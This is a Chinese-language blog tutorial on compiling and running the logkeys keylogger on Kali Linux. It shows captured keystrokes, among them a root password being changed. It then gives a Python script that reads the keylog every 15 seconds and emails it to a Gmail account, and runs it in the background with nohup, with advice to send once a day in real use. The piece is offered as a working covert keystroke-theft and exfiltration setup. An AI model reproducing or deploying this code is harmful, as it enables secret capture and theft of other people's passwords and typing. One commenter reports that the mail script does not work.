linux键盘记录软件 logkeys

logkeys是一个键盘记录软件,他的源代码托管在google code上,主页为https://code.google.com/p/logkeys/
测试环境是是Kali Linux

首先下载logkeys

解压

root@:~# tar -zxvf logkeys*
root@:~# cd logkeys*

看一下INSTALL文件

root@bogon:~/Desktop/logkeys-0.1.1a# cat INSTALL
===============================================================================
 logkeys keylogger - instalation instructions
===============================================================================
Provided your GNU/Linux distribution doesn't include logkeys package in its
repositories, manual installation of logkeys from source is as easy as:
 $ tar xvzf logkeys-0.1.0.tar.gz   # to extract the logkeys archive
 
 $ cd logkeys-0.1.0/build  # move to build directory to build there
 $ ../configure            # invoke configure from parent directory
 $ make                    # make compiles what it needs to compile
 ( become superuser now )  # you need root to install in system dir
 # make install            # installs binaries, manuals and scripts
That's it.
To ever uninstall logkeys, remove accompanying scripts and manuals, issue
 # make uninstall    # in the same logkeys-0.1.0/build dir from before
See README file for usage instructions and notes.
root@bogon:~/Desktop/logkeys-0.1.1a#

帮助文档写的很清楚了,接下来是编译

root@:~/logkeys-0.1.1a# cd build
root@:~/logkeys-0.1.1a/build# ls
root@:~/logkeys-0.1.1a/build#
//linux编译的经典三部曲
root@bogon:~/Desktop/logkeys-0.1.1a/build# ../configure
root@bogon:~/Desktop/logkeys-0.1.1a/build# make
root@bogon:~/Desktop/logkeys-0.1.1a/build# make install
root@bogon:~/Desktop/logkeys-0.1.1a/build# ls 
config.h  config.log  config.status  Makefile  man  scripts  src  stamp-h1
root@bogon:~/Desktop/logkeys-0.1.1a/build# cd src 
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# ls 
llk  llkk  llkk.o  llk.o  logkeys  logkeys.o  Makefile

logkeys就是生成的二进制文件

root@bogon:~/Desktop/logkeys-0.1.1a/build/src# cp logkeys /bin
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# ls
llk  llkk  llkk.o  llk.o  logkeys  logkeys.o  Makefile
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# logjeys  -h
bash: logjeys: 未找到命令
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# logkeys -h
logkeys: invalid option -- 'h'
Usage: logkeys [OPTION]...
Log depressed keyboard keys.
  -s, --start               start logging keypresses
  -m, --keymap=FILE         use keymap FILE
  -o, --output=FILE         log output to FILE [/var/log/logkeys.log]
  -u, --us-keymap           use en_US keymap instead of configured default
  -k, --kill                kill running logkeys process
  -d, --device=FILE         input event device [eventX from /dev/input/]
  -?, --help                print this help screen
      --export-keymap=FILE  export configured keymap to FILE and exit
      --no-func-keys        log only character keys
      --no-timestamps       don't prepend timestamps to log file lines
      --post-http=URL       POST log to URL as multipart/form-data file
      --post-size=SIZE      post log file when size equals SIZE [500k]
Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log
          logkeys -s -d event6
          logkeys -k
logkeys version: 0.1.1a
logkeys homepage: <http://code.google.com/p/logkeys/>
root@bogon:~/Desktop/logkeys-0.1.1a/build/src#

在logkeys的参数中,最麻烦的是”-m”键盘布局选项
我使用默认的键盘布局文件,得到的结果如下

root@bogon:~# logkeys -k
root@bogon:~# logkeys -s -o /root/.logkeys
root@bogon:~# ls 
Desktop  Downloads  Python
root@bogon:~# cat .logkeys
Logging started ...
2013-11-13 08:36:57+0800 > ka 
2013-11-13 08:37:02+0800 > x܂t ,kofjeya root@bogon:~#

很明显的键位偏移了,可以使用”-u”参数指定标准美式键盘

root@bogon:~# logkeys -s -u -o .test.txt
root@bogon:~# ls 
Desktop  Downloads  Python
root@bogon:~# passwd root
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
root@bogon:~# cat .test.txt
Logging started ...
2013-11-13 08:42:52+0800 > ls 
2013-11-13 08:42:54+0800 > cat .test.txt
2013-11-13 08:42:59+0800 > clear
2013-11-13 08:43:09+0800 > ls 
2013-11-13 08:43:10+0800 > passwd root
2013-11-13 08:43:16+0800 > fuck<BckSp><BckSp><BckSp><BckSp><BckSp>f4ck
2013-11-13 08:43:29+0800 > f4ck
2013-11-13 08:43:31+0800 > cat .text<BckSp><BckSp>st.txt root@bogon:~#

搞定,如果这么结束的话就没意思了,接下来的才是重点

#!/usr/bin/env python
#coding=utf-8
import smtplib 
from email.Message import Message 
import time
import optparse
import sched
schedular=sched.scheduler(time.time,time.sleep)
def sendMail(theEmail, thePasswd):
    systemTime=time.strftime('%Y-%m-%d-%T',time.localtime(time.time()))
    try:
        fileObj=open("/root/.logkeys", "r")    #"/root/.logkeys"是键盘记录的输出文件,根据输出文件的不同适当的修改
        content=fileObj.read()
    except:
        print "Cannot read file\n"
        exit()
    message = Message() 
    message['Subject'] = 'Log Keys'    #邮件标题  
    message['From'] = "599449360@qq.com"
    message['To'] = theEmail  
    message.set_payload("当前时间"+systemTime+"\n"+content)    #邮件正文  
    msg = message.as_string() 
  
  
    smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20) 
    #sm.set_debuglevel(1)                   #开启debug模式  
    smtp.starttls()                          #使用安全连接  
    smtp.login(theEmail, thePasswd) 
    smtp.sendmail("599449360@qq.com", theEmail, msg) 
    time.sleep(5)                               #避免邮件没有发送完成就调用了quit()  
    smtp.quit() 
 
 
def perform(inc, theEmail, thePasswd):
    schedular.enter(inc,0,perform,(inc,theEmail, thePasswd))
    sendMail(theEmail, thePasswd)
def myMain(inc, theEmail, thePasswd):
    schedular.enter(0,0,perform,(inc,theEmail, thePasswd))
    schedular.run()
 
 
 
if __name__=="__main__":
    optObj=optparse.OptionParser()
    optObj.add_option("-u", dest="user", help="Gmail account")
    optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
    (options, args)=optObj.parse_args()
    
    emailName=options.user
    emailPasswd=options.passwd
    myMain(15, emailName, emailPasswd)  //15表示的是相隔时间,可以根据自己的需求设定

该脚本的作用是定时读取logkeys的输出文件,并发送到gmail邮箱。脚本的使用也很简单

root@bogon:~/Python# python mail.py -h
Usage: mail.py [options]
Options:
  -h, --help  show this help message and exit
  -u USER     Gmail account
  -p PASSWD   Gmail Passwd
root@bogon:~/Python# ls 
file.txt  mail.py  nohup.out
root@bogon:~/Python# nohup ./mail.py -u hackersirius0@gmail.com -p passwd &
[1] 7499
root@bogon:~/Python# nohup: 忽略输入并把输出追加到"nohup.out"



我测试的时候是以15秒为间隔,实际使用时远不需这么高的频率,一天一次差不多

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码
评论列表
  1. v7ce

    这个py脚本发送邮件 貌似用不了

添加新评论